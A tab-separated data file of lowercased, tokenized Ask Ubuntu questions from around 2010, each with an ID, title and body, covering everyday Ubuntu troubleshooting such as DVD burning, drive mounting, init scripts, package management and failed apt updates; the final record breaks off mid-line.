9575	how do i use brasero to burn a movie in dvd format ?	i have to present an assessment for my uni course in the form of a dvd movie ( so it can be played on a dvd player ) but so far , brasero does n't seem to be doing it . for example , i left it for over an hour today ( as it said it was burning ) and the dvd came out empty . other times , it flat out says it can not burn the dvd . i am running ubuntu 10.10 , i have ubuntu restricted extras installed and the medibuntu packages that allow me to watch dvds . any ideas ?
9576	keyboard short-cut to switch to a specific workspace using ctrl- [ 1-8 ] on numeric keypad	i have 8 workspaces in use throughout the day arranged as 2 rows x 4 columns . workspaces are numbered logically from 1-4 for the top row left-right , then 5-8 for the next row . i would like to be able to switch to a workspace using the keyboard combination ctrl-num where [ num ] corresponds to number [ 1-8 ] on my numeric keypad . gnome/compiz already allows me to switch workspaces via ctrl-alt-up/down/left/right or at least that is how i have configured it . finding a way to make the mapping and behavior described above however is still confounding me .
9578	where can i get experimental versions of dropbox ?	where can i get hold of the experimental versions of dropbox for ubuntu ? im looking for a version that allows the tray icons to be modified , and as far as im aware this functionality is only available in the latest versions . thanks .
9579	how long before a bug fix makes it through to the package manager ?	i am affected by this bug which appears to be fixed now . lazy beggar that i am , i do n't want to install it myself , so i 'm waiting for the bug fix to percolate through to the stable repositories . how long am i likely to be waiting ?
9581	is there a irc client which can use or emulate mirc scripts	i 've used mirc ( windows ) for years , and have some custom scripts , written in mirc 's own scripting language . is there an ubuntu/linux irc client which will allow me to use my scripts as-is ? failing that , is there a `` functions a lot like mirc '' client available ? i 've just tried pidgin 's irc client , but it seems to be quite basic . i could n't see any way for it to tap into channel activity via scripts . i do n't want to use wine ... winehq reports it as having too many bugs for my liking , and anyhow , i try to avoid using wine like i do windows : )
9591	filename encoding issue	i am getting a file with a faroese name and trying to save it in a php script : 2010_08_ătflutningur.xls in ubuntu 10.04 lts is saving it as : 2010_08_ďż˝tflutningur.xls ( invalid encoding ) i 've installed and run utf8-migration-tool , but with no effect . is this an ubuntu error that i can fix or i just have to give up and modify the name in php ? is there a document which states what is the acceptable charset for a filename in ubuntu , or what are the encoding specs ? thanks
9592	how to reinstall grub after burg	how is burg different from grub . i have installed burg and would like to know if at some point i want to go back to grub , how can i wipe burg and install grub back .
9596	elementary will not install	i really like elementary themes and i now want to install the elementary theme on my new re-installation of ubuntu . so when i typed this in sudo apt-get update & & sudo apt-get install elementary-theme and started the process it prompts if i want to continue [ y/n ] i then pressed y but still aborted . is their any other way to install the full theme or fix this error ?
9599	how to mount ntfs drive at startup	i 'm not even sure if this is the right question , but basically i have a partition with windows 7 on it ( named acer in my ubuntu places menu ) that i have to click on every time i start the computer in order for my music to come up in rhythmbox , since my music is stored on the windows drive . what i want to do is have the ntfs drive `` acer '' mount automatically when i start the computer , so my music is there automatically .
9602	help organizing music	i have an ubuntu server installation set up as a media server with subsonic in a medium sized office environment . i allow uploads from all employees to the media folder on the server . as you can imagine , it 's going to get a bit messy in there with multiple spellings of artist and album names for directory names , duplicate files , and incorrect filenames and tags . i was hoping i could find a script that i could run daily as a cron job to clean up the media drive . does anyone know of any that might work ? i would like to maintain a path similar to : /mnt/music/artist/album/song.file
9606	how to interpret these errors from syslog	my ubuntu has been acting weird lately . yesterday , it would n't boot normally , so i had to do a 'recovery mode ' boot . it said i had to do an fsck manually , which i did using a live cd . after this , i was already able to boot to the desktop but everything is so sluggish . apps would turn gray for seconds . sometimes other apps wont start at all . in other instances it it saying that the filesystem is in read-only mode . this is part of what i 've been getting : oct 26 21:23:56 kernel : [ 1900.960506 ] sd 0:0:0:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed oct 26 21:23:56 kernel : [ 1900.960533 ] end_request : i/o error , dev sda , sector 63206544 oct 26 21:23:56 kernel : [ 1900.960541 ] buffer i/o error on device sda1 , logical block 7900562 oct 26 21:24:00 kernel : [ 1904.146683 ] res 51/40:00:90:74 : c4/00:00:00:00:00/03 emask 0x9 ( media error ) oct 26 21:24:00 kernel : [ 1904.146692 ] ata1.00 : error : { unc } oct 26 21:24:03 kernel : [ 1907.351844 ] res 51/40:00:90:74 : c4/00:00:00:00:00/03 emask 0x9 ( media error ) oct 26 21:24:03 kernel : [ 1907.351853 ] ata1.00 : error : { unc } oct 26 21:24:06 kernel : [ 1910.482152 ] res 51/40:00:90:74 : c4/00:00:00:00:00/03 emask 0x9 ( media error ) oct 26 21:24:06 kernel : [ 1910.482161 ] ata1.00 : error : { unc } oct 26 21:24:09 kernel : [ 1913.604742 ] res 51/40:00:90:74 : c4/00:00:00:00:00/03 emask 0x9 ( media error ) oct 26 21:24:09 kernel : [ 1913.604751 ] ata1.00 : error : { unc } oct 26 21:24:12 kernel : [ 1916.792646 ] res 51/40:00:90:74 : c4/00:00:00:00:00/03 emask 0x9 ( media error ) oct 26 21:24:12 kernel : [ 1916.792656 ] ata1.00 : error : { unc } oct 26 21:24:15 kernel : [ 1919.922855 ] res 51/40:00:90:74 : c4/00:00:00:00:00/03 emask 0x9 ( media error ) oct 26 21:24:15 kernel : [ 1919.922864 ] ata1.00 : error : { unc } oct 26 21:24:16 kernel : [ 1920.056506 ] sd 0:0:0:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed oct 26 21:24:16 kernel : [ 1920.056533 ] end_request : i/o error , dev sda , sector 63206544 oct 26 21:24:16 kernel : [ 1920.056540 ] buffer i/o error on device sda1 , logical block 7900562 oct 26 21:24:55 kernel : [ 1959.134566 ] res 51/40:00 : e0:28:44/00:00:00:00:00/04 emask 0x9 ( media error ) oct 26 21:24:55 kernel : [ 1959.134575 ] ata1.00 : error : { unc } oct 26 21:25:05 kernel : [ 1969.674292 ] res 51/40:00 : b2:4c:44/00:00:00:00:00/04 emask 0x9 ( media error ) oct 26 21:25:05 kernel : [ 1969.674301 ] ata1.00 : error : { unc } oct 26 21:25:08 kernel : [ 1972.887782 ] res 51/40:00 : b2:4c:44/00:00:00:00:00/04 emask 0x9 ( media error ) oct 26 21:25:08 kernel : [ 1972.887791 ] ata1.00 : error : { unc } oct 26 21:25:12 kernel : [ 1976.059674 ] res 51/40:00 : b2:4c:44/00:00:00:00:00/04 emask 0x9 ( media error ) oct 26 21:25:12 kernel : [ 1976.059683 ] ata1.00 : error : { unc } oct 26 21:25:15 kernel : [ 1979.206592 ] res 51/40:00 : b2:4c:44/00:00:00:00:00/04 emask 0x9 ( media error ) oct 26 21:25:15 kernel : [ 1979.206601 ] ata1.00 : error : { unc }
9607	what does 'lock version ' do ?	having installed an experimental version of dropbox and installed in manually , i dont want the deb in synaptic to download any updates ( as theyll over write the changes ive done manually i assume ) . ive found the lock version option in synaptic , im assuming this stops a particular deb from downloading any new versions of itself ? also can i just unlock it again when the version from the deb catches up with the experimental version that i have installed ? am i correct or does it serve another function ?
9616	how do i get vimeo videos to play properly ?	youtube videos play fine in firefox and chrome . however , vimeo videos are always choppy . what can i do to get them to play normally ? i 'm running a tecra a4 with a vga compatible controller : ati technologies inc m24 1p [ radeon mobility x600 ] screenshot per comment request
9620	irssi shows wine in `` unchanged '' list in synaptic package manager	i was downloading an irc client called irssi via the synaptic packet manager but it listed wine and wine1.2 in the unchanged list ( of dependencies ) . i do have wine installed . this suggests to me that irssi is dependent on wine . what is a windows-related app doing in an linux repository ?
9622	how to turn off automount in ubuntu server 10.04	i have an external usb hdd ide enclosure that i use to back up and then wipe old hard drives . my questions is : how do i prevent ubuntu server from auto mounting these drives ? most of the instructions i 've seen online refer to turning off auto mounting for desktop installs . edit : to clarify , i am plugging in the usb enclosure after the machine is running . i do n't want it to auto mount when i plug in and turn on the power to the external enclosure .
9630	not mounting/finding 1tb ntfs drive	i am having trouble with ubuntu recognizing/finding/mounting one of my hard drives . i dual boot ubuntu and windows 7 . i had ubuntu 10.04 and all drives showed up under `` places '' i could click on any of my windows/ntfs drives and they would mount as they should . i have since updated to ubuntu 10.10 . one of my drives no longer shows up in `` places '' or in nautilus . i can open gparted and it is listed there , but if i try to click the mount button , i get an error . i am currently at work and can not post any screenshots or errors , but will happily do so later . i was just hoping that someone might be able to give me something to try when i get home . 250gig sata hard drive ( windows7/ntfs ) - recognized/mountable 200gig pata hard drive ( ubuntu 10.10 ) - recognized ( obviously ) 1tb sata hard drive ( ntfs ) - not recognized/wo n't mount thanks !
9632	elementary theme missing arrow in nautilus	i 've been using `` elementary theme '' for a while now and i have noticed , that there is a missing arrow at the end of the folder path . does anyone know why this is happening ? ? ? ?
9633	preferred apt repository	if i have to two repositories listed in my sources.list or sources.list.d is there a way to tell apt which is preferred ? my exact use case is if a package is found on the intranet repository and on the remote repository i want apt to always use the intranet one . right now it seems to pick randomly between the two .
9634	current exaile song in empathy status	i switched to exaile a while back , and the only thing i find lacking is the empathy integration , if i may call it that . i wish to be able to set my im status as the currently playing music track . rhythmbox did that out of the box . exaile does n't . any ideas ?
9639	what is 'tracker search tool '	in the picture above see the icon of magnifying glass . i did n't have this icon before , it is indexing my files . any idea what is it , i have maverick installed on 2 machines and both of them now have this icon . when i click on it and search for some file , on the title bar it says `` tracker search tool '' it is really cool to search for files but i would like to know that if it is one of the default app , even though it was not there before nor i installed any app like this .
9641	how to toggle display of filesystems in `` places '' menu ?	under places menu in gnome-panel and in the side-pane of nautilus browser a list of all filesystem on my hd is shown . is it possible to choose which one should be shown and keep the rest hidden ?
9642	how can i monitor the memory usage ?	i have used top to see the memory usage at the moment . but i would like to monitor the memory usage over a period of time . e.g start monitoring and then execute a few commands , and final stop the monitoring and see how much memory that have been used during the period . how can i do this on ubuntu server ? i guess i could start a cronjob every 5th second or so , and invoke a command that log the current memory usage in a textfile . but what command should i use to get the current memory usage in a format that is easy to log to a text file ?
9646	installing git to be used in a multi-user system	i need to install git on a server that will be shared and accessed by multiple users . i assume i will use git+ssh , so each user will have a system account , but how do i go about install git and a repository so that each user can push/pull over a local ip ?
9659	run gnome - command	i just installed some packages and after restart gui wo n't show . i can login in terminal but i need command to start gnome or better let it start automatically .
9663	why does google search always count more results in firefox or chrome than in chromium ?	it really puzzles me that any google search counts far more `` results '' in firefox or chrome than in chromium . google says `` about 1.460.000 results '' for `` natty narwhal '' in firefox or chrome but only 914.000 results in chromium . does anybody know why that is so ? which results are better ? to add some information : i was observing this for over a month on 4 different machines in 2 different networks using very different internet gateways . searches are performed more or less simultaneously thus the local ip and the network routes were similar . just to point this out again : the browser in question is chromium ( not chrome ) . update : according to bruce connor 's comments it may be that cookies , the state of being logged in or not , or other information influence search results . and , it 's true when performing a search in `` incognito '' mode of chromium as jhominal suggested far more results are displayed . to hopefully get a more precise answer : what might that be from my cookies or `` secret google user profile '' that makes about half a million results from the search irrelevant , to the opinion of google ?
9665	should i try to get rid of wubi ?	i did n't manage to boot from sd-card reader in my netbook , so i just used wubi to install ubuntu netbook edition ( 10.10 ) . the system works smoothly and i 'm glad with it , but there are certain perfomance problems : with eclipse and also when there are lots of tabs in chrome opened . i 'm thinking now about having a `` normal '' ubuntu install , but i 'm not really sure if it helps me . i do n't really want to set everything up again after reinstalling the whole system , so i 'm wondering if i really should try to get rid of wubi and is there any simple way to do that with keeping all my settings . thank you
9681	is there a command to see who owns an internet domain ?	is there a command to see who owns a specific internet domain address ? i have tried with whois example.com and i get some information . but for `` holder '' there is just a `` user id '' . is there any way to see who the actual user is ?
9682	after uninstalling kde in ubuntu some changes were not revoked ?	i installed kubuntu-desktop via apt for testing purposes in gnome . after removing kubuntu-desktop the bootscreen still is the kubuntu one and not changed back by the uninstall process to the origin ubuntu one . i also noticed that in my standart gnome ubuntu desktop some fonts and font-sizes changed especially in applications that use kde librarie like krusader and on the menus in gnome panel and some other applications . how can i revert these changes to the state before kubuntu-desktop was installed ?
9683	`` kernel panic not syncing out of memory and no killable process ''	i 'm installing ubuntu server 10.04 on a pentium 3 with 256 mb ram , i select install , continue with the process and when i see the `` configuring apt sources '' progress bar then i got the error : '' kernel panic not syncing out of memory and no killable process '' does anyone know this problem ? ? , do you think it could be because the size of the ram ? ? ive seen in the ubuntu server help that i only need 128 mb ram to install it . so i dont think its the problem . regards . edit : i ' ve made a new try downloading a minimal cd image and installing it , the packages needed were downloaded from internet and i have n't any problems . this is the link to the iso .
9687	how to prevent gnome screensaver 's `` random '' option from including images directory ?	i love gnome screensaver application and all the themes that can use be used with it -the defaults and additionals from the repositories . so i would like to prefer the `` random '' theme selection . the problem : there 's a choice as images directory among themes . when i opt for random , screensaver shows the content of my images directory as well . no need to give details , but this is not suitable for more than one reason . shortly , that directory is very private for me and screensaver , by nature , is to be wieved by everybody when we lock the screen and leave the computer . once upon a time there were a number of discussions on the issue , but the developers ' approach was something like this : `` this is not a bug , this is a feature '' . technically it may not be considered as a bug , but still it is a personal security issue for me . a workaround may be not to use the default images directory for images -or putting just a few screensaver-safe image in it- and to use another directory for the personal images , instead . i do n't like this way because desktop integration of gnome & ubuntu makes that directory -which comes as default- functional for some image related task . so the question : how can i choose random option for the gnome screensaver and yet not include the image directory to the line ?
9694	how to run two x sessions at the same time ?	i would like to run two x server instances at the same time . one would be an interactive session using the mouse and keyboard attached to the computer . the other would be a 'virtual ' session that i could then connect to and use over a network . in other words , i want something like telnet/ssh that allows me to log in to my ubuntu machine from somewhere else - however , i would like at least a basic graphics display when i log in .
9703	turn on 2nd nvidia screen using command-line	i have a ubuntu machine next to my tv . sometimes i use my tv ( hdmi ) as a secondary monitor , twinview . using the `` nvidia x server setting '' , nvidia-settings , i can turn the second monitor ( tv ) on or off . ( nvidia driver version is 260.19.06 ) however , since i do this quite frequently i would like to install a keyboard shortcut . so step one is to turn on/off the 2nd monitor using command line . any idea on how to control this , using command line ? cheers leif
9706	how do i keep empathy from telling the other person when i am typing ?	sometimes i start typing a message to someone then stop , rethink it and change it or not send it at all . i do n't want them to see `` user is typing '' messages . i see no option to disable this in empathy .
9714	what is the best picture compression tool ?	is there a tool which can achive good picture copression without loosing the image quality , and which produced optimal images for websites and can compress images in batches ?
9720	booting ubuntu desktop into command prompt	i use ubuntu desktop 10.10 on a netbook . quite often i use it as a proxy server ( squid3 ) and file server ( samba ) for my network . so when i am using it as a network server , is it possible to boot into only command prompt and there by i can bring down power usage and have a longer battery backup .
9726	how can i add an unlisted repository as my primary `` software sources '' ?	how can i add an unlisted repository to my software sources via its ( http/ftp ) : // ... url ? i am not referring to a single entry in the /etc/apt/sources.list . the url i am referring to points to a full-and-complete repository ( security updates main restricted universe mutliverse ) . i know about manually editing /etc/apt/sources.list , but that is a general pain compared to just adding the repository 's url into software sources ( if it is possible ) . is the software sources server-list dynamically downloaded from canonical , and/or is it somewhere on my file-system ? ... and would it work if i just add my url to this list , and then choose it via the normal software sourced dialog ? there does n't seem to be an `` add '' option in the `` ubuntu software '' tab of software sorces . i can only find the `` other '' option , which allows me to choose an alread listed server . *update* i 've just found a tool called apt-mirror which allows the building of a local mirror , so i assume that there must be a way to use this new mirror , and that it grafts into the normal apt-get/aptitude/synaptic system.. my `` new '' mirror is my isp 's not-fully-public linux mirror , and i assume it can be grafted in , too.. am i on the right train with this line of thought ?
9731	i 've setup ssh key login , but want to avoid a passphrase	i 've set up a passwordless login to a friend 's computer and everything works very well . i 've even edited my ~/.ssh/config to add his hostname and my username . so i just type ssh friend and it connects ... but every time i log out ( and back in ) before running ssh friend , i 'm asked for my passphrase . is there a way to avoid this ? i tried with ssh-add but it also locks on log-out .
9733	what is the difference between the memory usage report in system monitor and the one by free ?	i am using system monitor 2.28.0 . when i look in the resources tab , i see a nice graph with for memory and swap . memory is about 60 % 2.3 gib of 3.8 . when i type the command free , i got : total used free shared buffers cached mem : 3994908 3962396 32512 0 100852 1477032 -/+ buffers/cache : 2384512 1610396 swap : 8000328 28468 7971860 cat /proc/meminfo | grep memfree give memfree : 34536 kb the situation has remained the save for several minute . i started a lot of process with a script and the script is waiting for the free memory to get lower . according to what i am seeing in the process tab ( or with top ) , the number in system monitor seem a lot closed to the total of the memory of the process that the one reported by free . thanks
9734	setting up a server for student developers	i would like everyone 's to have a folder in the home directory to accessible over the internet w/ password protected . i would also like to limit how much everyone can have in the home folder . when they ssh on to the machine they also are only limited to viewing there files , and can see nothing beyond their home directory . i am setting up a server for some students doing some coding and sharing of files . i would appreciate any help with this . please and thank you .
9735	should i enable the ati proprietary driver ?	have the ati drivers improved any ? are they any better than the default open source driver ? are they worth enabling ?
9739	why does ubuntu installer not have a minimum memory condition ?	when installing ubuntu , there is a slide for checking met conditions . i observed that if you have for example only 384 mb of memory , the installer could crash . see https : //bugs.launchpad.net/bugs/658615 for details .
9741	video recording in cheese is slow	cheese records at painful fps . video recording is really slow in cheese almost unusable . how can i increase the fps for cheese . i have hcl laptop with built in 1.3 mp camera 2.47 ghz i3 processor with 2 gb ram . running maverick 32 bit . i installed camorama from software centre which has fine video ( fps ) , but i ca n't seem to use it due to some error . so i doubt there is something to be tweaked with cheese itself .
9743	cron is changing encoding ?	i have a legacy java program that outputs an sql script . i then use apache derby to run that sql on the target database ( which is not on the same server as cron ) . when run via putty , this works fine . when run in windows this works fine . when run using cron , derby reads âł signs as ? . if i look at the sql script generated ( using vi ) , it contains the âł signs . if i check the database however , it contains ? . why would running this under cron make the program behave any differently ?
9746	print to file in black and white ( not in greyscale )	i have these pdf files of c++code and they are colored which would be cool , except that the network printer here is b & w and the printed out codes come in various shades of pale grey which makes them essentially unreadable ( specially the comments ) . i would like everything ( text , codes , commands , ... ) to be printed in the same ( black ) color . i 've tried fuddling with the printer 's properties , but the closest thing i see is the 'level of grey ' tab , and there i have the choice between 'enhanced ' and 'normal ' ( and it does n't make a difference in my case ) . i 've tried 'print to file ' , but i do n't see any options there to print to b & w , i 've tried installing the 'generic cups printer ' , but again no options to print to b & w . any idea ? ( i 'm on 10.10 )
9747	how to give directory and file permissions to a web server	i 'm a linux newbie . i 'm doing a project that uses the gosmore routing engine . in one of my email to the developer about a certain problem , he replied to me that to solve the problem : '' i think you will have to move gosmore directory to a home directory and give the webserver read and execute rights . on my ubuntu installation this is the /home/lambertus/gosmore and my webpages run in /home/lambertus/public_html/yours . '' i did move the needed files to my home directory , and chmod it using this command : chmod -r 755 gosmore/ the thing is , when i `` ls -l '' for the gosmore directory , it displays that i had had already set the permission correctly ( drwxr-xr-x ... ) . but when i check permissions in the gosmore directory ( right-click > properties ) , the permissions are still not set . because of these , my gosmore installation does n't still work . what can i do to truly set the permissions that i need for the directories ? thanks in advance ! : d
9750	what do the following packages do ?	what does each of the packages do ? i was installing libmozjs-dev , and it said that the following packages need to be removed : couchdb-bin desktopcouch evolution-couchdb gnome-user-guide python-desktopcouch python-desktopcouch-records ubuntu-desktop ubuntu-docs xulrunner-1.9.1 yelp i see some are self-explanatory , what do the ones with couchdb mean ? and if i remove the packages , what effect will it have on my system ? thanks . edit : i am on karmic .
9752	implementing kernel timer in ubuntu	could you please give any basic example of a kernel timer ( start_ktimer ) implementation in ubuntu ?
9757	which is the most up to date and modern rss feed reader ?	what rss feed is the most update modern feed reader for my ubuntu desktop ? if you could have a website link or name to search in the software center that would be great . thank you .
9761	how do i get a csl usb modem u1-tf to work ?	how can i connect to internet using csl usb modem u1-tf ? i have no problems with huawei e550 but i ca n't connect using csl u1-tf . fixed - automatically available when plug in and is supported in ubuntu 10.10
9763	init.d script startup problems	i have this init.d script which i am trying to get to startup with ubuntu however it wont run at startup . it does work when i type `` sudo /etc/init.d/couchpotato start '' though . any ideas on how to get it starting at boot ? # ! /bin/sh # # # begin init info # provides : couchpotato application instance # required-start : $ all # required-stop : $ all # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : starts instance of couchpotato # description : starts instance of couchpotato using start-stop-daemon # # # end init info # # # # # # # # # # # # # # # edit me # # # # # # # # # # # # # # # # # # # path to app app_path=/usr/local/sbin/couchpotato # path to python bin daemon=/usr/bin/python # startup args daemon_opts= '' couchpotato.py -q '' # script name name=couchpotato # app name desc=couchpotato # user run_as=root pid_file=/var/run/couchpotato.pid # # # # # # # # # # # # # # # end edit me # # # # # # # # # # # # # # # # # # test -x $ daemon || exit 0 set -e case `` $ 1 '' in start ) echo `` starting $ desc '' start-stop-daemon -d $ app_path -c $ run_as -- start -- background -- pidfile $ pid_file -- make-pidfile -- exec $ daemon -- $ daemon_opts ; ; stop ) echo `` stopping $ desc '' start-stop-daemon -- stop -- pidfile $ pid_file ; ; restart|force-reload ) echo `` restarting $ desc '' start-stop-daemon -- stop -- pidfile $ pid_file sleep 15 start-stop-daemon -d $ app_path -c $ run_as -- start -- background -- pidfile $ pid_file -- make-pidfile -- exec $ daemon -- $ daemon_opts ; ; * ) n=/etc/init.d/ $ name echo `` usage : $ n { start|stop|restart|force-reload } '' > & 2 exit 1 ; ; esac exit 0
9764	ca n't install software from software center	i cant install anything from software centre , i get this error every time i click on install , `` require installation packages '' here is my output of sudo apt get update [ sudo ] password for gaurav : hit http : //security.ubuntu.com maverick-security release.gpg ign http : //security.ubuntu.com/ubuntu/ maverick-security/main translation-en get:1 http : //deb.opera.com stable release.gpg [ 189b ] ign http : //deb.opera.com/opera/ stable/non-free translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/main translation-en_in ign http : //security.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en_in ign http : //security.ubuntu.com/ubuntu/ maverick-security/restricted translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/restricted translation-en_in ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en_in hit http : //security.ubuntu.com maverick-security release ign http : //deb.opera.com/opera/ stable/non-free translation-en_in hit http : //deb.opera.com stable release get:2 http : //dl.google.com stable release.gpg [ 189b ] ign http : //dl.google.com/linux/talkplugin/deb/ stable/main translation-en ign http : //dl.google.com/linux/talkplugin/deb/ stable/main translation-en_in hit http : //download.virtualbox.org maverick release.gpg hit http : //security.ubuntu.com maverick-security/main sources ign http : //deb.opera.com stable/non-free i386 packages get:3 http : //dl.google.com stable release [ 1,338b ] get:4 http : //ppa.launchpad.net maverick release.gpg [ 307b ] ign http : //ppa.launchpad.net/bean123ch/burg/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/bean123ch/burg/ubuntu/ maverick/main translation-en_in ign http : //download.virtualbox.org/virtualbox/debian/ maverick/non-free translation-en ign http : //download.virtualbox.org/virtualbox/debian/ maverick/non-free translation-en_in hit http : //security.ubuntu.com maverick-security/restricted sources hit http : //security.ubuntu.com maverick-security/universe sources hit http : //security.ubuntu.com maverick-security/multiverse sources hit http : //security.ubuntu.com maverick-security/main i386 packages hit http : //security.ubuntu.com maverick-security/restricted i386 packages ign http : //deb.opera.com stable/non-free i386 packages hit http : //security.ubuntu.com maverick-security/universe i386 packages hit http : //security.ubuntu.com maverick-security/multiverse i386 packages err http : //extras.ubuntu.com maverick release.gpg could not connect to extras.ubuntu.com:80 ( 91.189.88.33 ) . - connect ( 110 : connection timed out ) err http : //archive.canonical.com maverick release.gpg could not connect to archive.canonical.com:80 ( 91.189.88.33 ) . - connect ( 110 : connection timed out ) err http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en unable to connect to extras.ubuntu.com : http : err http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en_in unable to connect to extras.ubuntu.com : http : err http : //archive.canonical.com/ubuntu/ maverick/partner translation-en unable to connect to archive.canonical.com : http : err http : //archive.canonical.com/ubuntu/ maverick/partner translation-en_in unable to connect to archive.canonical.com : http : ign http : //extras.ubuntu.com maverick release ign http : //archive.canonical.com maverick release ign http : //extras.ubuntu.com maverick/main sources/diffindex ign http : //archive.canonical.com maverick/partner sources/diffindex ign http : //extras.ubuntu.com maverick/main i386 packages/diffindex ign http : //archive.canonical.com maverick/partner i386 packages/diffindex ign http : //extras.ubuntu.com maverick/main sources ign http : //archive.canonical.com maverick/partner sources ign http : //archive.canonical.com maverick/partner i386 packages ign http : //extras.ubuntu.com maverick/main i386 packages ign http : //archive.canonical.com maverick/partner sources ign http : //extras.ubuntu.com maverick/main sources ign http : //archive.canonical.com maverick/partner i386 packages ign http : //extras.ubuntu.com maverick/main i386 packages err http : //archive.canonical.com maverick/partner sources unable to connect to archive.canonical.com : http : err http : //extras.ubuntu.com maverick/main sources unable to connect to extras.ubuntu.com : http : err http : //archive.canonical.com maverick/partner i386 packages unable to connect to archive.canonical.com : http : err http : //extras.ubuntu.com maverick/main i386 packages unable to connect to extras.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick release.gpg could not connect to in.archive.ubuntu.com:80 ( 111.91.91.37 ) . - connect ( 110 : connection timed out ) err http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick-updates release.gpg unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en_in unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en_in unable to connect to in.archive.ubuntu.com : http : ign http : //in.archive.ubuntu.com maverick release ign http : //in.archive.ubuntu.com maverick-updates release ign http : //in.archive.ubuntu.com maverick/main sources/diffindex ign http : //in.archive.ubuntu.com maverick/restricted sources/diffindex ign http : //in.archive.ubuntu.com maverick/universe sources/diffindex ign http : //in.archive.ubuntu.com maverick/multiverse sources/diffindex ign http : //in.archive.ubuntu.com maverick/main i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick/restricted i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick/universe i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick/multiverse i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick-updates/main sources/diffindex ign http : //in.archive.ubuntu.com maverick-updates/restricted sources/diffindex ign http : //in.archive.ubuntu.com maverick-updates/universe sources/diffindex ign http : //in.archive.ubuntu.com maverick-updates/multiverse sources/diffindex ign http : //in.archive.ubuntu.com maverick-updates/main i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick-updates/restricted i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick-updates/universe i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick-updates/multiverse i386 packages/diffindex ign http : //in.archive.ubuntu.com maverick/main sources ign http : //in.archive.ubuntu.com maverick/restricted sources ign http : //in.archive.ubuntu.com maverick/universe sources ign http : //in.archive.ubuntu.com maverick/multiverse sources ign http : //in.archive.ubuntu.com maverick/main i386 packages ign http : //in.archive.ubuntu.com maverick/restricted i386 packages ign http : //in.archive.ubuntu.com maverick/universe i386 packages ign http : //in.archive.ubuntu.com maverick/multiverse i386 packages ign http : //in.archive.ubuntu.com maverick-updates/main sources ign http : //in.archive.ubuntu.com maverick-updates/restricted sources ign http : //in.archive.ubuntu.com maverick-updates/universe sources ign http : //in.archive.ubuntu.com maverick-updates/multiverse sources ign http : //in.archive.ubuntu.com maverick-updates/main i386 packages ign http : //in.archive.ubuntu.com maverick-updates/restricted i386 packages ign http : //in.archive.ubuntu.com maverick-updates/universe i386 packages ign http : //in.archive.ubuntu.com maverick-updates/multiverse i386 packages ign http : //in.archive.ubuntu.com maverick/main sources ign http : //in.archive.ubuntu.com maverick/restricted sources ign http : //in.archive.ubuntu.com maverick/universe sources ign http : //in.archive.ubuntu.com maverick/multiverse sources ign http : //in.archive.ubuntu.com maverick/main i386 packages ign http : //in.archive.ubuntu.com maverick/restricted i386 packages ign http : //in.archive.ubuntu.com maverick/universe i386 packages ign http : //in.archive.ubuntu.com maverick/multiverse i386 packages ign http : //in.archive.ubuntu.com maverick-updates/main sources ign http : //in.archive.ubuntu.com maverick-updates/restricted sources ign http : //in.archive.ubuntu.com maverick-updates/universe sources ign http : //in.archive.ubuntu.com maverick-updates/multiverse sources ign http : //in.archive.ubuntu.com maverick-updates/main i386 packages ign http : //in.archive.ubuntu.com maverick-updates/restricted i386 packages ign http : //in.archive.ubuntu.com maverick-updates/universe i386 packages ign http : //in.archive.ubuntu.com maverick-updates/multiverse i386 packages err http : //in.archive.ubuntu.com maverick/main sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/restricted sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/universe sources unable to connect to in.archive.ubuntu.com : http : err http : //in.archive.ubuntu.com maverick/multiverse sources unable to connect to 